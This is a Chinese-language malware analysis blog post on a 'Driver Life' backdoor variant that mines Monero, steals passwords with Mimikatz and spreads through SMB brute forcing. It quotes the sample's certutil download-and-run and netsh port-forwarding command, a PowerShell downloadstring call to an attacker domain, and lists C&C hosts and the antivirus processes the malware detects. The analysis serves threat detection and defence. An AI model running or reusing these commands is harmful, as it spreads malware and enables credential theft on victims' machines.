驱动人生安全事件分析

  • A+
所属分类:安全文章

文章源自【字节脉搏社区】-字节脉搏实验室

作者-阿盟

扫描下方二维码进入社区

驱动人生安全事件分析

1. 攻击特征

1.病毒会创建计划任务持续使用PowerShell.exe下载其他恶意程序。

2.病毒运行挖矿程序占用计算机资源,影响正常使用。

3.病毒运行木马程序用于自身持久化驻留和操控计算机。

注:通过任务管理器查看CPU较高使用率和多个PowerShell.exe进程,能初步判断机器中了此木马,查看其计划任务有随机名,调用PwoerShell确定木马病毒存在。

攻击链路:

驱动人生安全事件分析

驱动人生安全事件分析

驱动人生”后门变种,从木马中提取的相关域名和ip如下:

v.beahh.com/o.beahh.com/new.beahh.com/cert.beahh.com/loop.hqo.net/w.beahh.com

C&C端ip:172.104.73.9/172.104.78.101/153.92.4.49

病毒MD5:96bdb44e072122ee05fb8e729063463c

病毒名称svchost.exe

该木马运行后会释放一个m.ps1 PowerShell运行程序,此程序会调用Mimikatz脚本,进行本机用户和密码的抓取, 同时创建计划任务,每天固定时间点自动向XX.beahh.com发送http请求下载域名解析后服务器上的程序,并以HTA(内含微软某CVE漏洞的payload)运行方式执行的命令。

该木马会发送基于445端口的SMB数据包,同时具有扫描内网和外网开放445端口的ip,即便已安装永恒之蓝的补丁,也无法遏制内网传播,一旦开启了SMB服务则有可能会中毒,该木马是利用445端口进行SMB域账户爆破,该病毒实施的SMB爆破行为,是基于SMBV2协议的一种攻击方式,且木马中内置弱口令账户和密码,同通过IPC$空连接进行SMB服务的账户爆破或登陆。

该病毒获取到用户名或密码时,无论是爆破还是抓取到的用户名密码,通过IPC$登陆后,对中病毒机器执行以下命令进行远程下载执行,同时设置端口转发,将来自65532端口的流量转发到1.1.1.1地址的53端口,将来自65531端口的流量转发到1.1.1.1地址的53端口。

cmd.exe /c certutil -urlcache -split -f http://dl.haqo.net/dl.exe c:/install.exe&c:/install.exe&netsh firewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53

病毒同时也会创建可写文件update.exe文件。

驱动人生安全事件分析

分析update.exe如下:

该文件中发送指令通过RSA算法进行加密,        获取指令后通过编码RSA公钥进行解密,最终执行远程命令。

文件中对I am the mxr report进行互斥体判断,打开互斥体,即mxr(门罗币挖矿)程序。

病毒拥有远控功能,运行后将本机的CUP型号,操作系统版本,MAC地址,ip地址,域用户名,显卡信息,挖矿线程,以及计算机参数传递给终端:

该脚本新增一个计划任务,计划每天7:00运行

C:windowstempsvchost.exe程序,同时向域名端发送远程下载执行命令,加密内容解密后为:

(NewObjectNet.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN)

病毒具有识别以下杀毒软件的功能:|360tray.exe|360sd.exe|avp.exe|vMonXP.exe|RavMonD.exe|Mcshield.exe|egui.exe|kxetray.exe|knsdtray.exe|TMBMSRV.exe|avcenter.exe|ashDisp.exe|rtvscan.exe|ksafe.exe|QQPCRTP.exe


驱动人生安全事件分析

2.分析

文件操作

样本启动后会在“%username%AppDataLocalTemp”目录下创建_MEI24082文件夹(文件夹后的数字24082为随机生成的),释放恶意代码执行需要的库文件。

驱动人生安全事件分析

驱动人生安全事件分析驱动人生安全事件分析


释放powershell脚本文件并执行mimikatz模块,运行mimi操作后,释放了另一个配置文件

驱动人生安全事件分析

驱动人生安全事件分析

mkatz.ini文件中为抓取到的用户密码hash值

驱动人生安全事件分析

驱动人生安全事件分析

进程操作

执行cmd命令查询域名信息、本地管理员组信息:

驱动人生安全事件分析

驱动人生安全事件分析

判断当前环境是否在域中,由于测试机未加入域,此操作失败。

驱动人生安全事件分析

驱动人生安全事件分析

释放PowerShell脚本并执行,命令行参数为

驱动人生安全事件分析

驱动人生安全事件分析

判断自身所在的路径,如果不是则拷贝自身到当前用户的缓存目录中再次启动:

驱动人生安全事件分析

驱动人生安全事件分析

计划任务

以system账户创建计划任务,查找并删除名称为“Autocheck”、“Autostart”、“escan”的计划任务:

驱动人生安全事件分析

驱动人生安全事件分析

 其中一个计划任务会定时连接:

http://w.beahh.com/page.html?p%COMPUTERNAME%

驱动人生安全事件分析

通知!

公众号招募文章投稿小伙伴啦!只要你有技术有想法要分享给更多的朋友,就可以参与到我们的投稿计划当中哦~感兴趣的朋友公众号首页菜单栏点击【商务合作-我要投稿】即可。期待大家的参与~

驱动人生安全事件分析

记得扫码

关注我们

本文始发于微信公众号(字节脉搏实验室):驱动人生安全事件分析

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: